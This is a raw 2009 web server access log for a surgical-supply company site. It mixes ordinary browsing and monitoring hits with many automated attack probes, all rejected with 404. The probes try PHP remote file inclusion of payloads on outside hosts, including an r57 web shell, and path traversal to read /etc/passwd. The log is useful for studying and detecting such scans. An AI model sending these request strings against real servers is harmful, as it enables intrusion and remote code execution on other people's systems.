74.190.183.23 - - [12/Aug/2009:07:06:44 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
190.144.44.36 - - [12/Aug/2009:07:07:11 -0400] "GET /logs/access_log.Q109052300%20%20/index.php?sourcedir=http://www.freewebtown.com/fucku8/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Aug/2009:07:07:11 -0400] "GET /logs/access_log.Q109051900%20%20/index.php?sourcedir=http://www.freewebtown.com/fucku8/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Aug/2009:07:07:11 -0400] "GET /logs/index.php?sourcedir=http://www.freewebtown.com/fucku8/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Aug/2009:07:07:11 -0400] "GET /index.php?sourcedir=http://www.freewebtown.com/fucku8/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Aug/2009:07:07:51 -0400] "GET /logs/access_log.Q109080100/setup.php?dir=http://www.photopark.com/nalog/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Aug/2009:07:07:51 -0400] "GET /setup.php?dir=http://www.photopark.com/nalog/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Aug/2009:07:07:51 -0400] "GET /logs/setup.php?dir=http://www.photopark.com/nalog/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Aug/2009:07:08:04 -0400] "GET /logs/access_log.Q109072200/setup.php?dir=http://www.photopark.com/nalog/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:08:35 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.190.183.23 - - [12/Aug/2009:07:08:59 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76416 "http://acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:01 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:01 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:01 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:01 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:01 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:01 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:01 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:01 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:01 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:01 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:01 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:01 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:01 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:02 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:02 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:02 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:02 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:02 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:02 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:02 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:02 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:02 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:02 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:02 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:02 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:02 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:03 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:03 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:09:05 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
62.141.47.10 - - [12/Aug/2009:07:09:12 -0400] "GET /logs/access_log.Q109060200%20/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://www.robot-ch.org/gallery/albums/bov/bovsp.txt?&mode=id HTTP/1.1" 404 269 "-" "-"
62.141.47.10 - - [12/Aug/2009:07:09:16 -0400] "GET /logs/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://www.robot-ch.org/gallery/albums/bov/bovsp.txt?&mode=id HTTP/1.1" 404 246 "-" "-"
218.27.203.107 - - [12/Aug/2009:07:09:17 -0400] "GET /logs/access_log.Q109062400%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:07:09:17 -0400] "GET /logs/error_log.Q109061000%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:07:11:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.83.177 - - [12/Aug/2009:07:11:14 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:07:11:14 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:07:11:14 -0400] "GET /logs/access_log.Q109062300/lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:07:11:14 -0400] "GET /logs/error_log.Q109062300/lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:07:11:14 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:07:11:14 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:07:11:14 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:07:11:14 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:07:11:14 -0400] "GET /logs/access_log.Q109062300/lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:07:11:14 -0400] "GET /logs/access_log.Q109062300/lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:07:11:15 -0400] "GET /logs/error_log.Q109062300/lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:07:11:15 -0400] "GET /logs/error_log.Q109062300/lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
219.240.39.223 - - [12/Aug/2009:07:11:25 -0400] "GET //survey/classes/core/v4.5id1?/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr/bbs/Fellz1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
219.240.39.223 - - [12/Aug/2009:07:11:25 -0400] "GET /logs//survey/classes/core/v4.5id1?/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr/bbs/Fellz1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
219.240.39.223 - - [12/Aug/2009:07:11:26 -0400] "GET /logs/access_log.Q109051300//survey/classes/core/v4.5id1?/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr/bbs/Fellz1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
62.116.137.99 - - [12/Aug/2009:07:11:28 -0400] "GET /logs/access_log.Q109080500//modules/Forums/errors.php?error=http://ingrus.net/modules/Forums/images/card/r57?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
219.240.39.223 - - [12/Aug/2009:07:12:06 -0400] "GET /logs/access_log.Q109052200//survey/classes/core/v4.5id1?/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr/bbs/Fellz1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
64.221.88.162 - - [12/Aug/2009:07:12:13 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
64.221.88.162 - - [12/Aug/2009:07:12:13 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
64.221.88.162 - - [12/Aug/2009:07:12:14 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
64.221.88.162 - - [12/Aug/2009:07:12:14 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
91.121.83.177 - - [12/Aug/2009:07:12:23 -0400] "GET /logs/access_log.Q109062300%20%20/lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:07:12:25 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:07:12:26 -0400] "GET /logs/access_log.Q109062300/lostpasswd.php?env[include_prefix]=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:07:12:26 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:07:12:33 -0400] "GET /logs/error_log.Q109062300%20%20/lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:07:12:52 -0400] "GET /logs/access_log.Q109062300%20%20/lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:07:12:52 -0400] "GET /logs/error_log.Q109062300%20%20/lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:07:12:59 -0400] "GET /logs/access_log.Q109062300%20%20/lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:07:12:59 -0400] "GET /logs/error_log.Q109062300%20%20/lostpasswd.php?env[include_prefix]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Aug/2009:07:13:12 -0400] "GET /logs/access_log.Q109080100%20%20/setup.php?dir=http://www.photopark.com/nalog/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Aug/2009:07:13:13 -0400] "GET /logs/access_log.Q109052300/index.php?sourcedir=http://www.freewebtown.com/fucku8/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Aug/2009:07:13:13 -0400] "GET /logs/access_log.Q109051900/index.php?sourcedir=http://www.freewebtown.com/fucku8/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Aug/2009:07:13:18 -0400] "GET /logs/access_log.Q109072200%20%20/setup.php?dir=http://www.photopark.com/nalog/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:14:12 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:14:12 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:14:12 -0400] "GET /logs/access_log.Q109080100//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:14:12 -0400] "GET /logs/access_log.Q109072400//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:07:14:18 -0400] "GET /logs/access_log.Q109062300%20%20/lostpasswd.php?env[include_prefix]=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
172.16.1.73 - - [12/Aug/2009:07:14:55 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.73 - - [12/Aug/2009:07:14:56 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.73 - - [12/Aug/2009:07:14:56 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
117.110.74.195 - - [12/Aug/2009:07:15:42 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:15:42 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:07:16:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.66.94 - - [12/Aug/2009:07:16:39 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
117.110.74.195 - - [12/Aug/2009:07:17:10 -0400] "GET /logs/access_log.Q109080100%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:17:10 -0400] "GET /logs/access_log.Q109072400%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.234.100.46 - - [12/Aug/2009:07:18:06 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.dunsanpiano.com/log/log/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.234.100.46 - - [12/Aug/2009:07:18:06 -0400] "GET /appserv/main.php?appserv_root=http://www.dunsanpiano.com/log/log/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.234.100.46 - - [12/Aug/2009:07:18:07 -0400] "GET /logs/access_log.Q109060300/appserv/main.php?appserv_root=http://www.dunsanpiano.com/log/log/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.234.100.46 - - [12/Aug/2009:07:18:12 -0400] "GET /logs/access_log.Q109052000/appserv/main.php?appserv_root=http://www.dunsanpiano.com/log/log/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
110.45.138.141 - - [12/Aug/2009:07:20:35 -0400] "GET /logs//amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.srch.or.kr/bbs/images/fx29id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
110.45.138.141 - - [12/Aug/2009:07:20:35 -0400] "GET /logs/access_log.Q109071600//amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.srch.or.kr/bbs/images/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
110.45.138.141 - - [12/Aug/2009:07:20:35 -0400] "GET //amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.srch.or.kr/bbs/images/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:07:21:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [12/Aug/2009:07:21:19 -0400] "GET /logs/include/lib.inc.php?site_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Aug/2009:07:21:19 -0400] "GET /include/lib.inc.php?site_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Aug/2009:07:21:19 -0400] "GET /logs/access_log.Q109052800/include/lib.inc.php?site_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Aug/2009:07:21:19 -0400] "GET /logs/error_log.Q109052800/include/lib.inc.php?site_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
110.45.138.141 - - [12/Aug/2009:07:21:23 -0400] "GET /logs/access_log.Q109080500//amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.srch.or.kr/bbs/images/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:21:31 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:21:31 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:21:31 -0400] "GET /logs/access_log.Q109061900//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:21:31 -0400] "GET /logs/access_log.Q109062900//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
128.241.53.238 - - [12/Aug/2009:07:21:42 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
220.181.7.60 - - [12/Aug/2009:07:22:19 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
190.144.44.36 - - [12/Aug/2009:07:22:21 -0400] "GET /logs/access_log.Q109052800/include/lib.inc.php?site_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Aug/2009:07:22:21 -0400] "GET /include/lib.inc.php?site_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
117.110.74.195 - - [12/Aug/2009:07:22:22 -0400] "GET /logs/access_log.Q109053100%20%20/joomla/index.php?option=com_restaurante&task=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
